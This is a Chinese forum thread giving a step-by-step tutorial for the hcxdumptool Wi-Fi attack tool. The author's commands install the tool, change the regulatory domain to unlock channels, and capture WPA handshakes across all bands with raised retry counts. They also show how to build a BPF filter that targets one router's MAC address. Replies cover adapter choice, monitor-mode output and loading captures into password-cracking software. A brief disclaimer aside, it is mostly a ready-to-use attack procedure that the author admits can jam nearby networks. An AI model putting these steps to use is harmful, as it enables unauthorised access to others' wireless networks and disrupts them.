hcxdumptool 高级攻击工具----简单篇
本帖最后由 上上网 于 2024-2-18 14:33 编辑声明:使用此工具前,你必须有攻击网络的权限, 执行持久化攻击会导致附近网络阻塞甚至瘫痪, 如果由此导致不可评估后果, 所有法律责任由实施者承担。
工具hcxdumptool 6.3.2
下载安装最新
依次执行以下命令安装
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool-master
sudo make && sudo make install
有下不了的情况, 这有文件放进去执行上述命令即可
接下来
首先,设置到畅通无阻域是成功关键因素
sudo iw reg set IN && iw reg get
查看一下你要使用网卡接口
sudo hcxdumptool -l 或 sudo hcxdumptool -L
执行捕获你网卡支持所有频段握手包
sudo hcxdumptool-F --rds=1
默认自动使用网卡接口编号是wlan0,如果有插入多块网卡,需对应你自己要使用网卡接口位编号, 例如要使用-i wlan0 或 -i wlan2
执行
sudo hcxdumptool-i wlan0 -F --rds=1
从2.4ghz到5ghz历遍一次攻击周期约1-2分钟 ,-i wlan0网卡接口位编号, -F 使用网卡支持所有频段,--rds=1 排序,文件名称默认使用日期时间命名,如要指定文件名加参数-w, -w SSID.pcapng可用SSID 或MAC DCAEFB命名
如果信号较差,又必需要捕获到有效握手,增大重新攻击重试, 工具默认值是: attemptclientmax=10 attemptapmax=4
sudo hcxdumptool-F --rds=1--attemptclientmax=100 --attemptapmax=100
如果要攻击单个MAC路由器信号
1 > 先扫描一下2.4Ghz全部信道, 普通模式 --rcascan=p 主动模式 --rcascan=a如果网卡支持,主动模式会有信标响应,可按响应计数排序--rds=1
sudo hcxdumptool--rds=1--rcascan=p -c 1a,2a,3a,4a,5a,6a,7a,8a,9a,10a,11a,12a,13a,14a
或扫描你网卡支持2.4Ghz+5Ghz所有频率信道, 使用网卡支持所有信道参数-F 如不加参数-F 只扫描1, 6, 11信道
sudo hcxdumptool -F--rcascan=a--rds=1
2 > 设置网卡为监控模式(如果有插入多块网卡,对应你自己网卡接口位 -i wlan0),如果创建BPF过滤器失败情况, 需要执行一下这命令
sudo hcxdumptool -m wlan0
3 > 创建BPF过滤器, 需添加你网卡接口对应编号-i wlan0 攻击单个目标MAC: 00:00:00:00:00:01 创建BPF前需要执行一下设置网卡监控命令, 否则创建BPF可能会失败情况
执行创建BPF 攻击单个MAC路由器
sudo tcpdump -i wlan0 wlan addr3 000000000001-ddd>g.bpf
4 > 执行捕获单个MAC路由器
sudo hcxdumptool-F--bpf=g.bpf
有经验用户, 如要指定对应信道参数-c 如11 和 165信道,更准确地攻击, 减轻网卡活动周期优化时间。
注意要对应目标信道: 11a,165b2.4g信道加a5g信道加b6g信道加c是必须, 因为WiFi6不是唯一信道 !
sudo hcxdumptool-c 11a,165b--bpf=g.bpf
捕获文件默认在Home文件夹下 !文件名称是以日期时间命名, 文件格式是pcapng固定格式
补充图解
更详细信息hcxdumptool -help 或跳转 >>>
攻击WPA3降级从而捕获为WP2握手包
https://www.anywlan.com/forum.ph ... 321&fromuid=1093833
补充内容 (2024-5-28 11:18):
注意: 自从 hcxdumptool6.3.2 之后起版本, 需要安装依赖
sudo apt-get update
sudo apt install -y libpcap-dev 本帖最后由 上上网 于 2024-6-6 10:56 编辑
我自用过感觉较适合一些网卡系列
Mt7612u 2.4+5g 最好是外置天线,Linux内核驱动
RTL8812AU 2.4+5g 外天线 目前不是Linux内核,需要自己手动安装驱动
RT5572 2.4+5g 外天线,Linux内核驱动
RT3070 仅2.4g 外天线,Linux内核驱动
MT7921 2.4+5g+6g目前是较新型网卡,可能会遇到各种bug没得到能立即解决 上上网 发表于 2024-2-18 21:26
執筆、寫下情 发表于 2024-2-18 20:18
大佬,来了。截图来了,不知道为啥第一次运行这个命令没成功,第二次 ...
这次无线监管区域设置设置为IN了,好像还是显示不支持WiFi6呢?大佬帮看下
└─$ iw reg get
global
country IN: DFS-UNSET
(2402 - 2482 @ 40), (N/A, 20), (N/A)
(5150 - 5250 @ 80), (N/A, 30), (N/A)
(5250 - 5350 @ 80), (N/A, 24), (N/A)
(5470 - 5725 @ 160), (N/A, 24), (N/A)
(5725 - 5875 @ 80), (N/A, 30), (N/A)
┌──(kali㉿wifihack)-[~]
└─$ sudo hcxdumptool -m wlan0
Requesting interface capabilities. This may take some time.
Please be patient...
interface information:
phy idx hw-mac virtual-macm ifname driver (protocol)
---------------------------------------------------------------------------------------------
0 3 001uj4321714 34dfk2ddijk0985 * wlan0 mt7921u (NETLINK)
available frequencies: frequency tx-power of Regulatory Domain: IN
2412 20.0 dBm 2417 20.0 dBm 2422 20.0 dBm 2427 20.0 dBm
2432 20.0 dBm 2437 20.0 dBm 2442 20.0 dBm 2447 20.0 dBm
2452 20.0 dBm 2457 [ 10] 20.0 dBm 2462 [ 11] 20.0 dBm 2467 [ 12] 20.0 dBm
2472 [ 13] 20.0 dBm 2484 [ 14] disabled 5180 [ 36] 30.0 dBm 5200 [ 40] 30.0 dBm
5220 [ 44] 30.0 dBm 5240 [ 48] 30.0 dBm 5260 [ 52] 24.0 dBm 5280 [ 56] 24.0 dBm
5300 [ 60] 24.0 dBm 5320 [ 64] 24.0 dBm 5500 24.0 dBm 5520 24.0 dBm
5540 24.0 dBm 5560 24.0 dBm 5580 24.0 dBm 5600 24.0 dBm
5620 24.0 dBm 5640 24.0 dBm 5660 24.0 dBm 5680 24.0 dBm
5700 24.0 dBm 5720 24.0 dBm 5745 30.0 dBm 5765 30.0 dBm
5785 30.0 dBm 5805 30.0 dBm 5825 30.0 dBm 5845 30.0 dBm
5865 30.0 dBm 5955 disabled 5975 disabled 5995 disabled
6015 [ 13] disabled 6035 [ 17] disabled 6055 [ 21] disabled 6075 [ 25] disabled
6095 [ 29] disabled 6115 [ 33] disabled 6135 [ 37] disabled 6155 [ 41] disabled
6175 [ 45] disabled 6195 [ 49] disabled 6215 [ 53] disabled 6235 [ 57] disabled
6255 [ 61] disabled 6275 [ 65] disabled 6295 [ 69] disabled 6315 [ 73] disabled
6335 [ 77] disabled 6355 [ 81] disabled 6375 [ 85] disabled 6395 [ 89] disabled
6415 [ 93] disabled 6435 [ 97] disabled 6455 disabled 6475 disabled
6495 disabled 6515 disabled 6535 disabled 6555 disabled
6575 disabled 6595 disabled 6615 disabled 6635 disabled
6655 disabled 6675 disabled 6695 disabled 6715 disabled
6735 disabled 6755 disabled 6775 disabled 6795 disabled
6815 disabled 6835 disabled 6855 disabled 6875 disabled
6895 disabled 6915 disabled 6935 disabled 6955 disabled
6975 disabled 6995 disabled 7015 disabled 7035 disabled
7055 disabled 7075 disabled 7095 disabled 7115 disabled
monitor mode is active...
bye-bye
沙发啊沙发啊,同时问一下大神,这个可以用mt7921au网卡吗? 執筆、寫下情 发表于 2024-1-31 14:15
沙发啊沙发啊,同时问一下大神,这个可以用mt7921au网卡吗?
wifi6 mt7921au我没有,不知道哦 執筆、寫下情 发表于 2024-1-31 14:15
沙发啊沙发啊,同时问一下大神,这个可以用mt7921au网卡吗?
大佬,你买了7921的网卡么?是哪款啊 大佬,抓的为pcapng类似的握手包使用什么跑包软件能打开啊,看了下wifipr和ewsa识别不了pcapng类型的啊? 马上发财 发表于 2024-1-31 20:04
大佬,你买了7921的网卡么?是哪款啊
买了,淘宝上买的,花了100大洋,是一个WiFi6的,等收到,我试试效果哈 wc125123 发表于 2024-2-1 07:37
大佬,抓的为pcapng类似的握手包使用什么跑包软件能打开啊,看了下wifipr和ewsa识别不了pcapng类型的啊? ...
直接把后缀改为cap行不行呢? hc2200{:1_1:}{:1_1:}{:1_1:} hhhhu 发表于 2024-2-1 14:11
hc2200
来了一个新人,大家快来围殴他 執筆、寫下情 发表于 2024-2-1 12:23
直接把后缀改为cap行不行呢?
好的谢谢,等等试一下看看能行不 執筆、寫下情 发表于 2024-2-1 12:22
买了,淘宝上买的,花了100大洋,是一个WiFi6的,等收到,我试试效果哈
能发下链接或具体是啥型号的网卡呢?效果如何啊 wc125123 发表于 2024-2-1 16:11
好的谢谢,等等试一下看看能行不
试了吗?行不行呢